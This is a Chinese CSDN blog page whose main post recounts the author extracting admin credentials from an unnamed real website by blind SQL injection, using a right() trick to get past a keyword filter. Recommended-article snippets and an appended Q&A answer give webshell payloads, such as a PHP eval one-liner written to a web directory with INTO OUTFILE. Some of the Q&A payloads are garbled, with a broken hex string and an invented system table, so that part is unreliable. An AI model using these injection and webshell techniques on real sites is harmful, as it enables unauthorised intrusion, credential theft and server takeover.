另类sql注入拿webshell

最新推荐文章于 2024-08-05 22:16:17 发布
最新推荐文章于 2024-08-05 22:16:17 发布
阅读量4.8k 收藏
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lynnlovemin/article/details/8271331
版权

sql注入,想必大家都知道,本文教大家如果通过常规方法不行的前提下,拿下网站shell。

凡是以http://www.xxx.com/xxx.asp?id=1类似名称都可以通过著名的and 1=1 和and 1=2来检测是否存在漏洞。

当时我拿的一个网站(为了安全考虑,此时不举出该网站的名字),就以xxx代替,见谅。

我用and 1=1 and 1=2试了一下,发现该网站存在注入漏洞,并且是access数据库,然后又通过and exists (select * from admin)发现存在admin表

接着找到了两个关键字段:admin和password

当我想通过count(*)找该表有多少条数据的时候,该网站弹出如下对话框:

这倒是没关系,因为根据经验至少存在一条数据。然后开始猜解第一条数据的值,通过sql语句and (select top 1 asc(mid(admin,1,1)) from admin)>0时又弹出如下对话框:想必是该网站对某些字符都做了过滤,最后发现,除了select,像update,insert,delete都做了过滤,到这里是不是就该放弃了呢?答案当然是否定的还有一个函数不知大家还有印象不,那就是right()和left(),当时,我用left函数发现,其获得的ascii码始终是取出的字符串的第一个字符,然后我就想到用right()函数倒着猜解他的字段,这里admin字段长度为5,写入如下函数表达式:and (select top 1 asc(right(admin,1)) from admin)>0 依次类推,直到猜解出字段值。哈哈,几分钟后,成功破解出用户名和密码。

lynnlovemin
关注
冰蝎加密 WebShell 过杀软
悦分享
08-03 2406
演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell 正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加密原理、流量特征、检测方案进行探讨。"冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v3.0 bate,兼容性较之前的版本有较大提升。...
SQL高级注入使用之储存过程
Yatere的天平秤
04-24 1714
<br />      =====================================<br />                 =====SQL高级注入使用之储存过程 ====== <br />                 =====================================<br /><br /><br />转载注来自:http://itpro.blog.163.com <br />本人前几年整理的,后来一朋友要传给他了,我也贴出来供大家研究使用。<br />--
75.网络安全渗透测试—[SQL注入篇14]—[SQLSERVER+ASP-LOG日志备份拿webshell]
qwsn
01-19 2531
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER 日志备份相关概念 1、SQLSERVER的备份 2、数据库故障还原类型 3、ASP一句话: 4、此时我们就可以通过备份log文件,得到webshell了 5、优化webshell: 6、最终形成的payload: 7、如何判断是否拿到Webshell 二、SQLSERVER+ASP 日志备份拿webshell示例: 1、判断数据库名:mydb 2、备份日志,拿webshell 3、判断是否写入w
SQL注入得到WEBSHELL
11-15 1026
一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。 分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来,设想数据库中有之类的ASP标实符,导出文件,文件名以.ASP的形式保存。然后文件又保存在WEB
SQL注入webshell上传
最新发布
aihua002的博客
08-05 349
1.高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限,所以该选项为可以=‘“”/=一个路径,不能为NULL,secure_file_priv=“” 代表文件读写没有限制,secure_file_priv=一个路径,代表只能对该路径下文件进行读写,而secure_file_priv=NULL 代表不能对文件进行读写。首先webshell上传就是利用MySQL的文件读写注入而实现,要想上传webshell就得了解文件读写注入的原理。
mysql注入shell的内置函数_通过SQL注入得到WebShell的原理及步骤
weixin_32848231的博客
02-19 504
一.通过SQL注入得到WEBSHELL的原理:N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。分析:N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来,设想数据库中有之类的ASP标实符,导出文件,文件名以.ASP的形式保存。然后文件又保存在WEB的路径...
SQL注入(4)——实战SQL注入webshell
realmels的博客
05-27 1238
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP 通过一个实例来进行SQL注入的实战。 ...
冰蝎shell_红蓝对抗——加密Webshell“冰蝎”攻防
weixin_39631649的博客
12-21 937
演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加密原理、流量特征、检测方案进行探讨。0x01 “冰蝎”介绍...
《安天365安全研究》第二期.pdf
08-07
2.7SQL Server 2008 另类提权思路 2.7.1 生成反弹可执行文件 2.7.2 上传文件 2.7.3 运行反弹程序成功获取系统权限 2.7.4 获取服务器权限 2.8 信息收集之 SVN 源代码社工获取及渗透实战 2.8.1 公开源代码获取 2.8.2 ...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5550
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
SQL注入写入Webshell
weixin_43749601的博客
03-28 2868
前言 在平时的CTF题目中,我们只是利用SQL注入漏洞去获取flag,但是在实际的渗透环境中,我们可以利用SQL注入漏洞去上传一个webshell,进而获取网站的后台权限。 首先,对于能否写入webshell是有条件的: secure_file_priv 支持数据导出。MySQL用secure_file_priv这个配置项来完成对数据导入导出的限制。如果secure_file_priv=NULL,MySQL服务会禁止导入和导出操作。通过命令查看secure-file-priv`的当前值,确认是否允许导入导
sql注入getshell的几种方式
热门推荐
内心不种满鲜花就会长满杂草
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
SQL注入-getshell
LJH1999ZN的博客
02-15 1万+
一、getshell的含义 1.什么是shellShell 是一个程序,提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符,让用户从键盘输入命令,所以又称为命令行环境。 2.什么是webshell? WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执
sql注入getshell
摘星怪sec的blog
04-17 544
条件:web目录具有写的权限,能够使用单引号;知道网站绝对路径;secure_file_priv为空以sqli-labs举例,secure_file_priv的值默认是NULL(5.5之前默认是空的),则表示限制mysqId不允许导入以及导出在mysql/my.ini中查看是否有secure_file_priv参数,这里是没有的因此我们加上去:secure_flie_priv=''即可这里进行16进制转换,因此是0X开头,写入“
web安全】——基于SQL注入拿到webshell
Demo不是emo的博客
11-20 4897
今天参加远程面试的时候面试官问了这样一个题:“你知道哪些通过注入漏洞获取服务器权限的方法?请详细讲讲,”这我直接愣住了,平时渗透中sql注入我一般用来获取数据库的数据信息,虽然在我记忆中我曾经学过通过注入漏洞获取服务器权限的方法,但已经忘得差不多了,所以今天写一篇博客来巩固一下这方面的知识,希望对您们也有帮助
SQL注入webshell
xiaoka__的博客
11-21 2518
今天来说一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT … INTO OUTFILE 这个语句,下面是一个语句的例子:       SELECT * INTO OUTFILE ‘C:\log1.txt’ 例如: ?id=1’ union select 1,2,’<?php @eval($_REQUEST[cmd]);?>’ into outfile ‘C:\phpStudy\WWW\502g58de\hahaha.php’ --+ 然后菜刀连接就完了 搞不明白...
SQL注入写入文件方法(获取webshell
Goodric的博客
04-08 2715
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
sql注入写入webshell
06-28
### 回答1: SQL注入是一种攻击技术,可以利用应用程序中存在的漏洞,将恶意的SQL代码注入到应用程序中,从而获取应用程序的控制权。如果攻击者成功地注入了SQL代码,他们可以执行任意操作,包括写入WebshellWebshell是一种恶意代码,可以在受攻击的服务器上创建一个远程访问接口,允许攻击者执行任意命令。攻击者可以使用Webshell来窃取敏感数据、破坏系统、或者在服务器上安装其他恶意软件。 要利用SQL注入写入Webshell,攻击者需要找到一个易受攻击的应用程序,并利用应用程序中存在的漏洞注入恶意的SQL代码。一旦注入成功,攻击者可以使用SQL语句来创建一个Webshell文件,并将其写入服务器上的某个目录中。然后,攻击者可以使用Webshell来执行任意命令,包括上传和下载文件、执行系统命令、或者修改文件权限等操作。 为了防止SQL注入攻击,应用程序开发人员应该采取一系列措施,包括使用参数化查询、过滤用户输入、限制数据库用户的权限等。此外,管理员还应该定期检查服务器上的文件和目录,以确保没有Webshell存在。 ### 回答2: 什么是SQL注入SQL注入是一种攻击方式,用于通过对应用程序中的输入进行恶意注入,从而访问或与应用程序中的数据库进行交互。SQL注入通常利用应用程序的输入验证不严格,以及对数据库中的数据进行不安全的查询和处理,从而访问和操纵数据库。 什么是webshellWebshell是一种特殊的程序代码,可以通过Web接口进行访问和控制,可以给攻击者带来权限最高的系统操作权限。 如何通过SQL注入写入webshell? 攻击者通过SQL注入可以执行许多操作,包括获取或修改数据库中的数据,但更加危险的是可以通过写入webshell来获得对目标系统的完全控制。下面是一些通用的示例,介绍如何通过SQL注入外部攻击者写入webshell。 1. 通过UNICODE编码的方式写入webshell 攻击者可以通过在URL字符串中使用UNICODE编码来伪装恶意SQL注入代码,以此来避开Web应用程序的过滤器和安全防护措施。例如,攻击者可以使用以下语句,将webshell写入到一个包含BLOB类型的表中: ' UNION SELECT NULL, CAST(0x3C3F706870206576616C28245F5053545B312D31293B206966202869736572727065723F246F75745B315D290A7B2473797374656D3D2170737465725F6765745F636F6E74656E74735F75726C28293B2024746578743D2473797374656D5B31293B2073656E64286F62636F645B2272657175657374225D2E6"9"6"5"76616C285F504F53545B225F716"5"56"1"225D293B290A3F3E0A0A, NULL-- 此代码将webshell写入到一个表中,并通过使用PHP代码,能使其在服务器上运行。 2. 在注入点创建一个新表,并将webshell写入其中 攻击者可以通过多个SQL注入绕过过滤和检测,创建一个新的表并将webshell写入其中。例如,下面的代码可以被绕过,从而创建一个新的表: ' UNION SELECT NULL, 'CREATE TABLE webshell (id INT, shell text); INSERT INTO webshell(id, shell) VALUES (1,<?php eval($_POST[0]); ?>);' INTO OUTFILE '/var/www/html/new.txt'-- 此代码创建了一个新表“webshell”,其中包含列“id”和“shell”,并将webshell写入到以BLOB类型存储的“shell”列中。 3. 在目标服务器上创建一个外部表,并将webshell写入其中 攻击者还可以通过创建一个外部表,在连接到目标服务器时抓取webshell。例如,攻击者可以构建以下SQL语句以在目标服务器上创建名为“webshell”的外部表: CREATE TABLE webshell (id INT, shell text); INSERT INTO webshell(id, shell) VALUES (1, '<?php eval($_POST[0]); ?>'); 然后,攻击者可以请求一个可以对此表进行操作的URL: ' UNION SELECT NULL,'/var/www/html/?id=(SELECT GROUP_CONCAT(CONCAT(id,0x2C,shell),0x0A) FROM mysql.external_table WHERE table_name="webshell")' INTO OUTFILE '/var/www/html/output.txt'-- 该URL将在服务器上抓取webshell,并将其输出到/var/www/html/output.txt。攻击者现在可以从该位置获取完整的webshell,以便执行任意系统命令。 总结 SQL注入是一种令人不安的攻击方式,可以使黑客绕过应用程序的安全控制,从而访问和操纵系统中的数据。写入webshellSQL注入的最危险的结果之一,它允许黑客完全控制目标系统和数据。要保护Web应用程序免受SQL注入和其他攻击的威胁,建议采取一系列安全措施,包括在应用程序代码中实施更强大的输入验证和防御措施,利用Web应用程序防火墙和安全扫描器,以及升级和更新应用程序及其相关软件以减少漏洞和缺陷的风险。 ### 回答3: SQL注入是一种攻击技术,攻击者利用这种技术可以将恶意负载注入到应用程序的数据库中,包括写入webshell,从而获取系统控制权和敏感数据。SQL注入攻击是因为应用程序没有正确的验证用户输入数据而造成的。 SQL注入攻击者通过在应用程序的输入字段中输入特殊字符或语句,从而执行恶意SQL语句来覆盖或篡改应用程序的数据库。攻击者可以利用这个漏洞来写入webshell,从而获取远程访问到受害者的系统。 webshell是一种恶意软件,攻击者可以在受害者的主机上进行远程控制。攻击者可以利用webshell来窃取敏感信息、执行命令、上传或下载文件等操作。 攻击者通常会在注入恶意负载后,通过脚本或工具上传或执行webshell。一旦攻击者成功地写入webshell,他就可以通过浏览器或其他工具来远程控制受害者的系统。 为了防止SQL注入攻击,应用程序必须实施有效的数据验证和过滤,从而限制用户输入的字符和语句。此外,安装和更新防病毒和防火墙软件也是非常重要的。其他防御措施还包括使用安全套接字层(SSL)来加密数据传输,使用预编译语句来包含应用程序的数据查询,以及限制数据库用户的访问权限。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lynnlovemin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值